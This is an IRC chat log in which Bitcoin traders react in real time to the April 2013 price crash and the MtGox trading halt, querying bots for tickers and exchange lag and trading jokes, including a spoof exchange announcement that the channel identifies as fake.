Run for the exits..." Apr 11 15:44:59 looking at that list pizzaman1337 it seems they mostly have profits ? Apr 11 15:45:04 i see 10k, 13k 16k etc Apr 11 15:45:25 yep Apr 11 15:45:33 yeah, it seems pretty clear that the problem is not that they ran out of money Apr 11 15:45:34 time to sell everyone, who cares the price Apr 11 15:45:40 sell sell sell Apr 11 15:45:53 1dice97EC 17041.91 1dice8EMZ 18319.23 etc Apr 11 15:46:23 shhh, no facts right now...i want to pick up sdice at .001 ;) Apr 11 15:46:32 or are those cumulative all time ? Apr 11 15:48:20 mircea_popescu: So are you going to tweak the mpoebot so it doesn't sell calls for over 1BTC? Apr 11 15:48:35 prolly just take out those lines next month. Apr 11 15:48:46 if it wants to charge over 1 btc per who am i to argue. Apr 11 15:49:10 $avg Apr 11 15:49:11 ThickAsThieves: 170.11 Apr 11 15:49:42 maybe I will undercut the bot and sell for 1.05 Apr 11 15:49:56 sounds like a plan. Apr 11 15:50:17 hahaha Apr 11 15:54:16 i must say, it was very nice to have the passthroughs operating normally yesterday. Apr 11 15:54:52 i don't know how they did.... jurov, where did you get your vwap yesterday? Apr 11 15:55:19 mpex i assume Apr 11 15:56:11 i thought bought was not serving an $avg Apr 11 15:56:24 at least after noon EST Apr 11 15:57:30 it was sometimes Apr 11 15:57:44 but you had to get in relatively early Apr 11 15:58:58 http://www.reddit.com/r/Bitcoin/comments/1c4lqr/iama_algorithmic_and_high_frequency_trading/ Apr 11 15:59:06 could be bull Apr 11 15:59:27 bull as in bullshit not bull Apr 11 15:59:36 To my best knowledge, every firm with an algorithmic/HFT division has presence in multiple Bitcoin exchanges. Apr 11 15:59:44 that part is buttshit Apr 11 15:59:55 every firm with HFT doesn't give a shit about bitcoin Apr 11 16:00:02 i havent even read it through Apr 11 16:00:11 I read enough Apr 11 16:00:24 :> Apr 11 16:00:24 deadweasel, coinbr caches its wvap for some period if bitcoincharts returns an error Apr 11 16:00:37 probably interned somewhere Apr 11 16:00:42 wants to stir some shit Apr 11 16:00:48 i see. well, cheers to caching! Apr 11 16:01:16 well the part that bother me most is 1h lag and hft Apr 11 16:01:30 more like sft Apr 11 16:01:52 ^ yeah, i don't see how anything in btc could be considered HFT... Apr 11 16:02:17 current version of whale_watchers script: Apr 11 16:02:19 the infrastructure to do so successfully doesn't seem to exist yet... Apr 11 16:02:29 $ whale_watchers.sh bids Apr 11 16:02:29 goxlag 4.207002 seconds Apr 11 16:02:29 1365641026 price:110.20001 amount:1179.6732 Apr 11 16:02:29 1365679001 price:132.77758 amount:2011.6502 Apr 11 16:02:29 1365684834 price:130 amount:1172.13926341 Apr 11 16:02:29 1365684902 price:120 amount:1866.58691101 Apr 11 16:02:29 1365684937 price:100 amount:1129.38763907 Apr 11 16:02:30 1365685100 price:110 amount:1595.50795395 Apr 11 16:02:30 1365685337 edge:144.4/146.5 Apr 11 16:02:33 oh damnit sorry Apr 11 16:02:41 forgot we dont have \n in these parts Apr 11 16:03:42 [BTCTC] [ASICMINER-PT] 2 @ 0.7541 = 1.5082 BTC [-] Apr 11 16:05:32 every firm with HFT doesn't give a shit about bitcoin <<< ya well, kids and clues seldom meet. Apr 11 16:07:11 According to a Businessweek source, Foursquare netted just $2 million in revenue in 2012 Apr 11 16:07:12 lmao. Apr 11 16:07:41 satoshi dice made what, 70k btc. Apr 11 16:09:08 was that it? gosh Apr 11 16:09:49 ;;ticker Apr 11 16:09:49 BTCUSD ticker | Best bid: 143.81830, Best ask: 146.00000, Bid-ask spread: 2.18170, Last trade: 146.00000, 24 hour volume: 247441.18891750, 24 hour low: 105.00000, 24 hour high: 259.98000, 24 hour vwap: 169.88239 Apr 11 16:10:16 ;;seen krs1 Apr 11 16:10:16 krs1 was last seen in #bitcoin-assets 1 hour, 39 minutes, and 55 seconds ago: lol Apr 11 16:10:56 jurov: ah, bitcoin.de is exactly the sort of thing I was thinking of, thanks! Apr 11 16:11:09 ;;seen krs-1 Apr 11 16:11:09 krs-1 was last seen in #bitcoin-assets 17 hours, 3 minutes, and 27 seconds ago: this would be a scotch day Apr 11 16:11:28 I saw that a year or so ago and forgot. Apr 11 16:12:07 Well, it's close. Still acts as a trustee... hrm. Apr 11 16:14:03 [HAVELOCK] [VTX] 1 @ 0.29999998 BTC [+] Apr 11 16:15:44 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [+] Apr 11 16:15:58 !GOXLAG Apr 11 16:16:05 ;;goxlag Apr 11 16:16:06 MtGox lag is 49.296595 seconds. During this time, light travels 0.0987898244278 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 11 16:18:02 jurov: the bitcoinforums.com SMF Trader System stuff, feedback, etc... is P2P exchange the idea of that too? Apr 11 16:18:19 er, bitcoinforum.com Apr 11 16:19:18 You may want to snag the plural of that domain and redirect it to the singular. Assuming it's your site... I can't keep track of all you guys. Apr 11 16:20:54 hm Apr 11 16:20:56 !ping Apr 11 16:20:59 ;;ping Apr 11 16:21:00 pong Apr 11 16:21:01 k Apr 11 16:23:23 unbalanced idk, ask them directly Apr 11 16:23:25 cya later Apr 11 16:24:52 does $avg show the confident vwap that mpex options works from? Apr 11 16:25:07 $avg Apr 11 16:25:09 lippoper: 167.53 Apr 11 16:25:17 just hit 111 on btce Apr 11 16:25:32 ;;ticker Apr 11 16:25:33 BTCUSD ticker | Best bid: 125.00000, Best ask: 126.90000, Bid-ask spread: 1.90000, Last trade: 129.00000, 24 hour volume: 257385.98098882, 24 hour low: 105.00000, 24 hour high: 259.00000, 24 hour vwap: 167.96454 Apr 11 16:26:26 mircea_popescu does $avg show the confident vwap that mpex options works from? Apr 11 16:26:29 ;;bc,24hprc Apr 11 16:26:30 167.53 Apr 11 16:26:32 $avg Apr 11 16:26:34 mircea_popescu: 167.53 Apr 11 16:26:37 seems so yes Apr 11 16:27:17 it's at 130 on gox Apr 11 16:27:22 err 120 Apr 11 16:28:18 ;;goxlag Apr 11 16:28:19 MtGox lag is 142.335422 seconds. During this time, light travels 0.285238592021 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 11 16:30:28 the f- Apr 11 16:32:14 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Apr 11 16:33:08 100 on btc, 140 on bitfloor Apr 11 16:34:11 on the way to 65$ Apr 11 16:34:25 end of march price Apr 11 16:34:53 just a nice april fool for 10 days Apr 11 16:35:11 i'm skeptical Apr 11 16:36:15 ;;goxlax didnt help Apr 11 16:36:16 Error: "goxlax" is not a valid command. Apr 11 16:36:24 ;;goxlag Apr 11 16:36:26 MtGox lag is 268.171906 seconds. During this time, light travels 0.537413497022 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 11 16:36:38 ;;goxlag Apr 11 16:36:39 MtGox lag is 282.241931 seconds. During this time, light travels 0.565609669586 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 11 16:37:03 65 may be a little understated Apr 11 16:38:07 you mean you think itll go lower? Apr 11 16:38:19 WAT? Apr 11 16:38:24 is that bad print on the volume? Apr 11 16:38:26 or real Apr 11 16:38:41 57,000 BTC sell? Apr 11 16:39:54 oh jeez Apr 11 16:40:06 where :'( Apr 11 16:40:13 mtgox Apr 11 16:40:31 I dont know why it didnt take down price further Apr 11 16:40:42 look at the 1 minute Apr 11 16:40:52 slow 20k dump Apr 11 16:40:56 then a 20k buy Apr 11 16:41:02 [HAVELOCK] [VTX] 4 @ 0.29999998 = 1.2 BTC [+] Apr 11 16:41:05 wow Apr 11 16:41:13 nobody actually saw these trades? Apr 11 16:41:16 did it bottom yet Apr 11 16:41:20 how can i see these Apr 11 16:41:21 wall 120 done Apr 11 16:41:25 when websocket is down Apr 11 16:41:27 :| Apr 11 16:41:44 all this incompetence leaves so much room for conspiracies lol Apr 11 16:41:48 +theories Apr 11 16:42:09 whales are gone almost Apr 11 16:42:12 no support Apr 11 16:42:48 what feed do you watch Bugpowder Apr 11 16:42:53 clarkmoody working smoothly for you? Apr 11 16:43:59 Bugpowder: where did you see this? Apr 11 16:44:21 http://bitcoin.clarkmoody.com/widget/chart/ Apr 11 16:44:28 [MPEX] [O.USD.P122T] 1000 @ 0.07047095 = 70.471 BTC Apr 11 16:44:43 @MagicalTux> [22:43:25] pu everything into ram and everything will be ok <- new db serv has 128GB ram Apr 11 16:44:47 overkill Apr 11 16:44:49 wheres the bottom Apr 11 16:44:57 write shit software, buy more hardware Apr 11 16:45:01 but at least they are doing SOMETHING Apr 11 16:45:17 yup Apr 11 16:45:18 @MagicalTux | Ad0: sweating right now Apr 11 16:45:20 entire db fits in 1 GB Apr 11 16:45:27 buy 128 GB, that oughta solve it Apr 11 16:45:29 derp derp herp Apr 11 16:45:37 very nice error4733 Apr 11 16:46:33 its on clark moody Apr 11 16:46:40 no feeds are working well for me again Apr 11 16:47:00 #bitcoin-RT Apr 11 16:47:07 Got filled at 121 Apr 11 16:47:15 (buy) Apr 11 16:47:20 me too Apr 11 16:47:28 hedging with puts Apr 11 16:47:33 next floor is at 110 Apr 11 16:47:41 then 101 Apr 11 16:48:03 what puts are you buying? Apr 11 16:48:07 could be a very volatile day Apr 11 16:48:11 $avg Apr 11 16:48:13 ThickAsThieves: 165.16 Apr 11 16:48:16 cheap ones Apr 11 16:50:03 112, 10% spread Apr 11 16:50:06 state Apr 11 16:50:34 what effect does this have on btc-e when i try to buy btc there..seems like price is behind about 10 mins..but lower in price than the charts report Apr 11 16:50:34 two 2k whales holding at 110&100, two others at 140&180 Apr 11 16:51:33 $avg Apr 11 16:51:35 ThickAsThieves: 165.16 Apr 11 16:53:01 is it going up yet Apr 11 16:53:50 [MPEX] [S.DICE] 1275 @ 0.0029486 = 3.7595 BTC [+] Apr 11 16:54:43 [MPEX] [O.USD.P134T] 30 @ 0.25 = 7.5 BTC [+] Apr 11 16:56:38 no Apr 11 16:56:42 112 Apr 11 16:57:03 time to make some money girls Apr 11 16:57:13 wheres the bot? Apr 11 16:57:14 cant see that 110 floor lasting for long Apr 11 16:57:15 so like..i can buy at $108 on btc-e Apr 11 16:57:16 BTCUSD ticker | Best bid: 114.13545, Best ask: 118.80000, Bid-ask spread: 4.66455, Last trade: 118.80000, 24 hour volume: 264889.76286140, 24 hour low: 105.00000, 24 hour high: 258.50000, 24 hour vwap: 164.91260 Apr 11 16:57:25 scrat: meaning up or down from there? Apr 11 16:57:26 [BTCTC] [S.DICE-PT] 100 @ 0.00322 = 0.322 BTC [-] Apr 11 16:57:50 home back bot Apr 11 16:57:54 come back Apr 11 16:58:09 KRS-1: south Apr 11 16:58:56 cmon bot Apr 11 16:59:01 ;;goxlag Apr 11 16:59:03 MtGox lag is 486.069431 seconds. During this time, light travels 0.974077697419 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 11 16:59:09 bot always goes down when you need it Apr 11 16:59:17 yep Apr 11 16:59:19 118 Apr 11 16:59:22 yeah that 128 GB sure helped, lol Apr 11 16:59:23 lucky I got some Apr 11 16:59:27 how low will it og? Apr 11 16:59:32 how low will it go? Apr 11 16:59:43 gox's claims are all bullshit Apr 11 16:59:44 probably the bottom Apr 11 16:59:46 :) Apr 11 17:00:40 i really hope someone starts aggresively buying Apr 11 17:00:48 asks are so thin Apr 11 17:01:01 people are greedy..they just waiting. Apr 11 17:01:05 I am trying to get filled Apr 11 17:01:25 lets hope for $65 Apr 11 17:01:34 I got bids all the way down Apr 11 17:02:10 i dont think we're gonna get below 50 Apr 11 17:02:18 but 100-70 seems likely Apr 11 17:02:24 111.50 Apr 11 17:03:07 gox website hanging Apr 11 17:03:31 1:1 extention of the first downmove lands it at $29 Apr 11 17:03:31 oh boy Apr 11 17:03:51 i dont know what that means Apr 11 17:04:26 ;;goxlag Apr 11 17:04:29 MtGox lag is 506.639759 seconds. During this time, light travels 1.01530040441 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 11 17:05:07 fear the reaper... Apr 11 17:05:25 bitocin charts is working Apr 11 17:05:29 bot is not Apr 11 17:05:32 soooooo? Apr 11 17:06:05 ;;ticker Apr 11 17:06:07 BTCUSD ticker | Best bid: 118.80000, Best ask: 122.98700, Bid-ask spread: 4.18700, Last trade: 122.98700, 24 hour volume: 267142.03759412, 24 hour low: 105.00000, 24 hour high: 258.50000, 24 hour vwap: 164.36507 Apr 11 17:06:13 keeps going up eh Apr 11 17:06:41 $avg Apr 11 17:06:43 deadweasel: 165.16 Apr 11 17:07:13 are you expecting a rapid change? Apr 11 17:07:14 oh geez, check this out Apr 11 17:07:16 you keep doing that Apr 11 17:07:18 on gox Apr 11 17:07:23 "Market cooldown, order placing suspended until 2013-04-12 11:00:00 UTC" Apr 11 17:07:48 wtf is that shit Apr 11 17:07:57 where were they yesterday Apr 11 17:08:02 lol Apr 11 17:08:02 more sells after that im sure Apr 11 17:08:23 ahahaha whaT! Apr 11 17:08:39 i'm not joking Apr 11 17:09:07 WOW Apr 11 17:09:09 well Apr 11 17:09:10 at least Apr 11 17:09:12 wow Apr 11 17:09:14 mtgox is killing itself Apr 11 17:09:17 better than any ddos Apr 11 17:09:23 self dos Apr 11 17:09:28 ahahahahah Apr 11 17:09:28 heh. Apr 11 17:09:32 what. the. fuck. Apr 11 17:09:33 you gox'd it Apr 11 17:09:37 this is exxcellent Apr 11 17:09:38 shadenfreude Apr 11 17:09:40 taub: lul Apr 11 17:09:46 what did i misssss? Apr 11 17:09:57 so i am guessing next is the announcement of "mpoe-pr was right all along, we were running fractional reserve, Apr 11 17:10:00 gox taking a break? Apr 11 17:10:04 all your coins are lost, sorry, we're gone" Apr 11 17:10:11 [10:07] on gox Apr 11 17:10:11 [10:07] "Market cooldown, order placing suspended until 2013-04-12 11:00:00 UTC" Apr 11 17:10:26 oh you guys are just joking Apr 11 17:10:27 damn Apr 11 17:10:40 what? Apr 11 17:10:42 not joking gesell Apr 11 17:10:48 want a screenshot? Apr 11 17:10:57 ThickAsThieves put it on dtng Apr 11 17:11:03 fucking circuitbreakers Apr 11 17:11:03 wouldnt be surprised mp... they have been spewing some incompetent shit in their announcments Apr 11 17:11:08 FUCK Apr 11 17:11:20 Bugpowder not a circuit breaker. Apr 11 17:11:35 they weren't "circuit breaking" yest's runup either. Apr 11 17:12:01 there it is Apr 11 17:12:07 just tried to place on Apr 11 17:12:08 one Apr 11 17:12:17 market cooldown Apr 11 17:12:21 Market cooldown, order placing suspended until 2013-04-12 02:00:00 UTC Apr 11 17:13:00 that is fucked Apr 11 17:13:00 is it 2 utc or 11 utc ? Apr 11 17:17:27 oh internet, i love you so Apr 11 17:17:30 lol Apr 11 17:19:38 gox disappears and price goes up Apr 11 17:19:38 not bad Apr 11 17:19:38 it was rising on mtgox too before they shut down Apr 11 17:19:39 i trust weexchange.co but you'll have to make the market Apr 11 17:19:39 bot still down Apr 11 17:19:39 ;;goxlag Apr 11 17:19:39 not even sure if public Apr 11 17:19:44 verification you upload the docs yourself Apr 11 17:19:48 MtGox lag is 1.735291 seconds. During this time, light travels 0.00347750373471 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 11 17:20:04 how is it lagging without trades? Apr 11 17:20:14 heard they were taking it offline for server upgrades Apr 11 17:20:16 weex was $400 to buy yesterday! Apr 11 17:20:20 $140 to sell Apr 11 17:20:24 :) Apr 11 17:20:37 so is mtgox offline atm? Apr 11 17:20:46 trading is off Apr 11 17:20:50 they are bullshitting you, how is there lag Apr 11 17:20:54 wb all Apr 11 17:21:10 lag counter is directly derived from orders... Apr 11 17:21:19 ;;goxlag Apr 11 17:21:19 MtGox lag is 1.222528 seconds. During this time, light travels 0.00244993242389 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 11 17:21:31 maybe people canceling orders Apr 11 17:21:35 lol Apr 11 17:21:36 yeah Apr 11 17:22:45 ;;bc,stats Apr 11 17:22:49 Current Blocks: 230820 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1019 blocks | Next Difficulty In About: 6 days, 7 hours, 54 minutes, and 2 seconds | Next Difficulty Estimate: 9084557.01163 | Estimated Percent Change: 18.39642 Apr 11 17:22:56 ;;nethash Apr 11 17:22:56 68695.4140799 Apr 11 17:23:24 mp, why no bot? Apr 11 17:23:37 cuz no data ? Apr 11 17:23:48 thought it was from bitcoincharts Apr 11 17:23:51 its up Apr 11 17:23:53 yeah. Apr 11 17:23:56 been up Apr 11 17:23:59 well what can i tell you. bot has to get it. Apr 11 17:24:28 all the bids are going to be vaporized when we come up Apr 11 17:24:46 This could be fun Apr 11 17:24:56 cancelled all buys down to 52 Apr 11 17:25:09 hopefully the 52 and below will get filled Apr 11 17:25:11 right, why would anyone leave current bids up Apr 11 17:25:15 mtgox has no business being involved in bitcoin Apr 11 17:25:19 this much is clear. Apr 11 17:25:20 well Apr 11 17:25:33 I'm leaving some up for the possible crash and rebound bounce Apr 11 17:26:19 so now is the outside market gonna use gox orderbook for reference? hehe, ... Apr 11 17:26:30 lol Apr 11 17:27:44 MagicalTux: "So, today I would like to inform everyone that DDoS that began earlier in the day was quickly mitigated by our new hardware upgrades. These included adding another Linux server with 128GB of memory! to our already existing Pentium Pro servers. However, despite these improvements once again our own suscess caused a massive sell off as tons of new users added to MTGox decided to crash the market by not buying any bitcoin" Apr 11 17:28:20 "Due to this continued success we will be suspending the exchange for a few hours so that everyone has time to open a bottle of chapagne" Apr 11 17:28:35 lol Apr 11 17:28:42 brilliant. Apr 11 17:28:49 wheres that from? Apr 11 17:28:59 me. Apr 11 17:29:05 just tired of this Apr 11 17:29:05 goodun Apr 11 17:29:19 what are you serious ? Apr 11 17:29:27 i guess this is good for the market Apr 11 17:29:28 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 11 17:29:33 maybe if they live without gox for a day Apr 11 17:29:39 we can reroute the bloodflow Apr 11 17:29:45 this is a good point. Apr 11 17:29:51 However, despite these improvements once again our own suscess caused a massive sell off as tons of new users added to MTGox decided to crash the market by not buying any bitcoin" Apr 11 17:29:51 hopefully they reopen and nobody goes back. Apr 11 17:29:55 did he really write that? Apr 11 17:29:56 what a nitwit Apr 11 17:30:00 i cant believe it Apr 11 17:30:02 taub nah it's a spoof Apr 11 17:30:07 its jokes taub Apr 11 17:30:07 good grief Apr 11 17:30:09 thanks Apr 11 17:30:10 but still Apr 11 17:30:13 dont be surprised Apr 11 17:30:15 taub: u dun goofed Apr 11 17:30:18 the funny part is where everybody readily mistakes it for the original. Apr 11 17:30:18 could've been him lol Apr 11 17:30:21 if their next statement mirrors that Apr 11 17:31:03 he did halt trading on MtGox tho Apr 11 17:31:11 yea Apr 11 17:32:12 is the order book updating to show cancellations? Apr 11 17:32:26 no Apr 11 17:32:29 sadly Apr 11 17:32:49 at least not the one on clarkmoody Apr 11 17:32:55 I've been pointing to the bitcon-otc order book to everyone freaking on bitcointalk.org.. Apr 11 17:33:02 hopefully they see that they can still trade. Apr 11 17:33:11 hopefully. Apr 11 17:33:19 if mtgox never comes back it will be too soon. Apr 11 17:33:23 sorry Apr 11 17:33:26 He did not write that Apr 11 17:33:27 I wrote it Apr 11 17:33:39 too believable! Apr 11 17:33:48 [MPEX] [S.MPOE] 7900 @ 0.00069713 = 5.5073 BTC [-] Apr 11 17:33:51 put it on redit (as a lie) Apr 11 17:34:22 my possition is still all held in BTC, still. But I dont care, this has to change Apr 11 17:35:14 Guys its cool Apr 11 17:35:15 (2013/4/11) Market Cooldown: Orders will not be accepted for the moment as we need to upgrade our database to accommodate the trading volume. However, you may still cancel your pending and open orders. Trading will resume at 11.00 am JST. Apr 11 17:35:25 just a planned outage Apr 11 17:35:58 order book is updating Apr 11 17:36:04 watch the bids melt Apr 11 17:36:28 ;;bids 0 Apr 11 17:36:28 where> Apr 11 17:36:32 bitcoinity Apr 11 17:36:32 There are currently 92569212 bitcoins demanded at or over 0.0 USD, worth 7168972.79161 USD in total. | Data vintage: 0.0081 seconds Apr 11 17:36:44 wow, people on reddit are pretty gulable Apr 11 17:37:09 bitcoinity shows an orderbook? Apr 11 17:37:14 i'm missing out Apr 11 17:37:30 i thought it only shows last trades Apr 11 17:37:38 lol... orderbook melts... Apr 11 17:37:45 huge crash impending.... Apr 11 17:37:56 oh boy oh boy Apr 11 17:37:57 so much for trying to stop the crash... Apr 11 17:38:00 i'm gonna get filled Apr 11 17:38:02 at 51 Apr 11 17:38:05 I can feel it Apr 11 17:38:12 how do i see orderbook on bitcoinity? Apr 11 17:38:27 yeah. Neat getting filled Apr 11 17:39:11 hmm Apr 11 17:39:15 should have kept the 72 Apr 11 17:39:24 ;;asks 72 Apr 11 17:39:24 There are currently 0 bitcoins offered at or under 72.0 USD, worth 0.0 USD in total. | Data vintage: 17.1812 seconds Apr 11 17:39:28 Dip might be very fast Apr 11 17:39:41 aren't you being optimistic? Apr 11 17:39:42 price is holding up on other ex Apr 11 17:39:42 think this will be permanent or is this our new reality never to see > $100 again Apr 11 17:40:06 ;;eightball will we see 100 again Apr 11 17:40:07 It is so. Apr 11 17:40:12 there ya go Apr 11 17:40:33 ;;eightball will we see 200 again? Apr 11 17:40:34 No chance. Apr 11 17:40:38 lol Apr 11 17:40:41 lol Apr 11 17:40:48 gribble :( Apr 11 17:40:50 so much for gribble's magic eightball Apr 11 17:41:00 lol Apr 11 17:41:09 f'n eightball Apr 11 17:41:19 ;;eightball will the market stabilize around $150? Apr 11 17:41:19 Come again? Apr 11 17:41:29 face or chest? Apr 11 17:41:43 Come again? Apr 11 17:42:05 ;;eightball Pirate40 refund every1 Apr 11 17:42:05 NO! Apr 11 17:42:31 ;;eightball Will options bot resume before Gox does? Apr 11 17:42:32 NO. Apr 11 17:42:38 aw Apr 11 17:42:46 hahaha Apr 11 17:42:47 knew it Apr 11 17:43:02 ;;eightball Will we see 1 cent per BTC this month? Apr 11 17:43:02 Maybe... Apr 11 17:43:10 ;;eightball does Lippoper have any chance of getting laid? Apr 11 17:43:10 You're kidding, right? Apr 11 17:43:16 ;;eightball Will we see 1 USD per BTC this month then? Apr 11 17:43:17 It is possible. Apr 11 17:43:50 ;;eightball will my C200s have any value this month? Apr 11 17:43:51 No chance. Apr 11 17:43:52 ;;eightball Does the bubble pops? Apr 11 17:43:52 One would be wise to think so. Apr 11 17:43:54 hehe Apr 11 17:44:05 I love eightball Apr 11 17:44:08 ;;eightball and anyone, should I buy in at $100/btc ? Apr 11 17:44:31 ;;eightball is mircea and mpoe-pr the same person Apr 11 17:44:31 I doubt it very much. Apr 11 17:44:46 eightball is very accurate overall Apr 11 17:44:50 ;;eighbtall are you sure? Apr 11 17:44:50 Error: "eighbtall" is not a valid command. Apr 11 17:44:52 ;;eightball Should I buy in at $100/btc ? Apr 11 17:44:58 90% accuracy. So much for generic statements Apr 11 17:44:58 ;;eightball Are you sure? Apr 11 17:44:58 No. Apr 11 17:45:23 ;;eightball will you be my trading consultant? Apr 11 17:45:24 In your dreams. Apr 11 17:45:29 ;;eightball Are you sure, I shouldn't buy in at $100/btc ? Apr 11 17:45:30 No. Apr 11 17:45:30 hehe Apr 11 17:45:41 ;;eightball will satoshi nakatomo come back one day ? Apr 11 17:45:41 You know the answer better than I. Apr 11 17:45:43 ;;eightball so I should buy in at $100 per btc, right? Apr 11 17:45:44 The answer is certainly yes. Apr 11 17:45:59 too many answers Apr 11 17:46:23 ;;eightball can i trust you ? Apr 11 17:46:23 You know the answer better than I. Apr 11 17:46:33 ok fellas cut the crap now Apr 11 17:47:33 "eightball: satoshi will arrive in a cloud of glory and be welcome by all with eculiptus leaves IF mtgox lag is <120.000 ELSE he will come with vengeance and scorn and smite all those that placed their faith in the magic of the tux" Apr 11 17:48:26 ;;eightball satoshi will arrive in a cloud of glory and be welcome by all with eculiptus leaves IF mtgox lag is <120.000 ELSE he will come with vengeance and scorn and smite all those that placed their faith in the magic of the tux Apr 11 17:48:26 Of course. Apr 11 17:50:13 ;;eightball WILL satoshi will arrive in a cloud of glory and be welcome by all with eculiptus leaves IF mtgox lag is <120.000 ELSE he will come with vengeance and scorn and smite all those that placed their faith in the magic of the tux? Apr 11 17:50:13 Obviously. Apr 11 17:50:18 cool Apr 11 17:50:23 ;;goxlag Apr 11 17:50:24 MtGox lag is 5.763025 seconds. During this time, light travels 0.011549037574 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 11 17:50:44 how many hours until Gox is back online? Apr 11 17:50:50 gox lagging while doing nothing, cute Apr 11 17:51:06 all those cancellations need to update the other ordrs Apr 11 17:51:12 for funded status Apr 11 17:51:14 most likely Apr 11 17:51:36 bids have not changed drastically Apr 11 17:52:06 lmao the bot really likes the volatility. Apr 11 17:52:21 $avg Apr 11 17:52:22 ThickAsThieves: 160.59 Apr 11 17:52:38 http://images.plus613.net/images/2/e/f/7/www_plus613_net_polarTube.jpg Apr 11 17:52:46 what do the order books look like Apr 11 17:53:00 ^^ Apr 11 17:53:14 your bot is retarrrrrded Apr 11 17:53:23 lippoper: http://www.timeanddate.com/countdown/generic?p0=1440&iso=20130412T02&year=2013&month=4&day=12&hour=2&min=0&sec=0&msg=MtGox%20Starts%20Trading&csz=1 Apr 11 17:53:23 ... Apr 11 17:54:26 These stupid bots, keep buying for decimal points higher, then the price increases super slowly, and others sell much lower, then bot panic sells and the other bots make this shit worse, it's like microphone feedback when you have more than one mic in the room. Apr 11 17:56:02 btc-e is selling just above 100 Apr 11 17:56:03 so Apr 11 17:56:06 [BTCTC] [COG.F] 1 @ 2.49 BTC [+] Apr 11 17:56:07 all of the sudden Apr 11 17:56:19 the bot thinks 68 is the best breakeven? Apr 11 17:56:34 for puts Apr 11 17:56:47 $depth p500t Apr 11 17:56:49 mircea_popescu: O.USD.P500T Bids: ['1000 @ 2.11888746'] Apr 11 17:56:50 mircea_popescu: Asks: ['1000 @ 19.24887621'] Apr 11 17:57:00 ;;calc 1 / 20.2488 Apr 11 17:57:00 0.049385642606 Apr 11 17:57:03 49 even Apr 11 17:57:19 not what i meant Apr 11 17:57:32 lowest risk break even Apr 11 17:57:40 $avg Apr 11 17:57:43 mircea_popescu: 160.46 Apr 11 17:57:54 $depth p161t Apr 11 17:57:56 mircea_popescu: O.USD.P161T Bids: ['1000 @ 0.13213399'] Apr 11 17:57:57 mircea_popescu: Asks: ['1000 @ 1.79400702'] Apr 11 17:58:14 ;;calc 161 / 2.794 Apr 11 17:58:15 57.6234788833 Apr 11 17:58:17 57 Apr 11 17:58:41 P116 Apr 11 17:58:47 84 currently Apr 11 17:58:48 anywho Apr 11 17:58:57 thats quite a change Apr 11 17:59:08 it obviously didn't like the drop Apr 11 17:59:34 doesnt seem to be so averse to spikes? Apr 11 17:59:38 76 Apr 11 18:00:23 [BTCTC] [S.DICE-PT] 340 @ 0.0032 = 1.088 BTC [+] Apr 11 18:01:57 ;;ticker Apr 11 18:01:58 BTCUSD ticker | Best bid: 120.00000, Best ask: 123.40098, Bid-ask spread: 3.40098, Last trade: 120.00000, 24 hour volume: 262114.69964268, 24 hour low: 105.00000, 24 hour high: 255.00000, 24 hour vwap: 162.35695 Apr 11 18:02:01 lalaal Apr 11 18:02:16 $70 Apr 11 18:02:18 looks like btc from gox just hit btce Apr 11 18:03:05 $65 Apr 11 18:04:03 rubbing my eyes Apr 11 18:04:20 when to buy..when to buy... Apr 11 18:04:46 It would pretty much be impossible to come back from this Apr 11 18:05:04 All of the idiots thinking Anonymous hacked Mt.Gox is causing everyone to sell everything. Apr 11 18:05:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7551 BTC [-] Apr 11 18:05:12 [BTCTC] [ASICMINER-PT] 1 @ 0.755 BTC [-] Apr 11 18:05:21 mtgox must go. Apr 11 18:05:25 [BTCTC] [ASICMINER-PT] 1 @ 0.7541 BTC [-] Apr 11 18:05:28 yep Apr 11 18:05:28 [BTCTC] [ASICMINER-PT] 1 @ 0.75402 BTC [-] Apr 11 18:05:31 Sell now before they get your account info and make off with your money, they are saying. Apr 11 18:05:31 [BTCTC] [ASICMINER-PT] 1 @ 0.75401 BTC [-] Apr 11 18:05:39 [BTCTC] [ASICMINER-PT] 6 @ 0.753 = 4.518 BTC [-] Apr 11 18:05:43 [BTCTC] [ASICMINER-PT] 2 @ 0.75202 = 1.504 BTC [-] Apr 11 18:05:47 [BTCTC] [ASICMINER-PT] 1 @ 0.75201 BTC [-] Apr 11 18:05:49 what do the order books look like Apr 11 18:05:50 [BTCTC] [ASICMINER-PT] 2 @ 0.751 = 1.502 BTC [-] Apr 11 18:05:50 and the sheeple are selling Apr 11 18:05:53 [BTCTC] [ASICMINER-PT] 1 @ 0.7501 BTC [-] Apr 11 18:06:06 it was the sheeple that put the price where it was Apr 11 18:06:17 let them sell Apr 11 18:06:19 btc-e at 85 Apr 11 18:06:26 ;;ticker --currency CAD Apr 11 18:06:27 BTCCAD ticker | Best bid: 118.89825, Best ask: 125.32470, Bid-ask spread: 6.42645, Last trade: 114.00000, 24 hour volume: 903.89633115, 24 hour low: 106.20810, 24 hour high: 254.66214, 24 hour vwap: 167.03981 Apr 11 18:06:34 oh nevermind thats gox Apr 11 18:06:41 doing pretty well at virtex Apr 11 18:08:05 chicken little has entered the building. Apr 11 18:08:33 going back up on btc-e Apr 11 18:09:12 ;;ticker --last Apr 11 18:09:14 120.00000 Apr 11 18:09:32 that's because btc-e implemented a verification process in order to stop the Goxers from panic selling all of their BTC on there. Apr 11 18:09:37 so wait, mtgox halted trading to "let things cool off" ? Apr 11 18:09:48 tahts their new line yeah Apr 11 18:09:56 halted trading? Apr 11 18:10:00 "Trading is halted until 2013-04-12 02:00am UTC to allow the market to cooldown following the drop in price. Read more details on the support." Apr 11 18:10:08 